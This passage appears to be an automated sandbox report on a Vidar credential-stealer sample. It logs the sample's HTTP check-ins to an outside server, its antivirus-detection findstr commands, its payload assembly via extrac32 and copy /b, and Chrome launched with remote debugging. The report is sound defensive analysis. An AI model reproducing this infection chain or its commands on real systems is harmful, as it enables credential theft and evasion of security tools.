                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:38 GMT
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    42192.168.2.55002620.189.173.14434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC1033OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307255840&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 9876
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1; msnup=
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC9876OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 31 33 3a 34 37 3a 33 35 2e 38 33 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 36 35 38 33 61 34 66 62 2d 31 62 31 63 2d 34 62 31 37 2d 39 35 63 31 2d 66 62 61 35 31 61 35 65 61 66 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 34 38 33 30 33 32 36 35 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-27T13:47:35.839Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"6583a4fb-1b1c-4b17-95c1-fba51a5eaf72","epoch":"483032657"},"app":{"loca
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:39 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=80fecc27c9a34e55bb4bfd4b5e6e7c9d&HASH=80fe&LV=202412&V=4&LU=1735307258804; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 13:47:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=a8600d46cdc44eed8885d3cc76e5cfe7; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 14:17:38 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2964
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:38 GMT
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    43192.168.2.550027116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----R1DBSJMYMYM7QI5FCJM7
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:38 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 52 31 44 42 53 4a 4d 59 4d 59 4d 37 51 49 35 46 43 4a 4d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------R1DBSJMYMYM7QI5FCJM7Content-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------R1DBSJMYMYM7QI5FCJM7Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------R1DBSJMYMYM7QI5FCJM7Cont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:39 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    44192.168.2.550034116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:41 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----8QIEKNOZMOZU37QQQIWL
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 38 51 49 45 4b 4e 4f 5a 4d 4f 5a 55 33 37 51 51 51 49 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 38 51 49 45 4b 4e 4f 5a 4d 4f 5a 55 33 37 51 51 51 49 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 38 51 49 45 4b 4e 4f 5a 4d 4f 5a 55 33 37 51 51 51 49 57 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------8QIEKNOZMOZU37QQQIWLContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------8QIEKNOZMOZU37QQQIWLContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------8QIEKNOZMOZU37QQQIWLCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:41 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                                    Start time:08:45:55
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\JA7cOAGHym.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    File size:1'199'374 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:6E90F0E42285206DCE01FFBBD748B081
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                                                    Start time:08:45:56
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmd
                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                                                    Start time:08:45:56
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                                                    Start time:08:45:57
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                                                                    Imagebase:0xd50000
                                                                                                                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                                                    Start time:08:45:57
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                    Imagebase:0xba0000
                                                                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                                                                    Start time:08:45:58
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                                                                    Imagebase:0xd50000
                                                                                                                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                                    Start time:08:45:58
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                    Imagebase:0xba0000
                                                                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                                                    Start time:08:45:59
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:cmd /c md 208079
                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                                                    Start time:08:45:59
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:extrac32 /Y /E Validation
                                                                                                                                                                                                                                                                                    Imagebase:0x2a0000
                                                                                                                                                                                                                                                                                    File size:29'184 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                                                                    Start time:08:45:59
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:findstr /V "SAO" Offering
                                                                                                                                                                                                                                                                                    Imagebase:0xba0000
                                                                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                                                    Start time:08:45:59
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:cmd /c copy /b ..\Involve + ..\Iso + ..\Leo + ..\Viewpicture y
                                                                                                                                                                                                                                                                                    Imagebase:0x790000
                                                                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                                                                    Start time:08:46:00
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:Pokemon.com y
                                                                                                                                                                                                                                                                                    Imagebase:0x90000
                                                                                                                                                                                                                                                                                    File size:947'288 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439280630.0000000004234000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439391577.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439480420.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439435287.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000003.2439221836.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                                                                    Start time:08:46:00
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                    Imagebase:0x870000
                                                                                                                                                                                                                                                                                    File size:28'160 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                                                                    Start time:08:46:55
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                                                                                                    Start time:08:46:56
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2320,i,6168099794620049130,9093318800782108175,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6068e0000
                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                                                                    Start time:08:47:09
                                                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
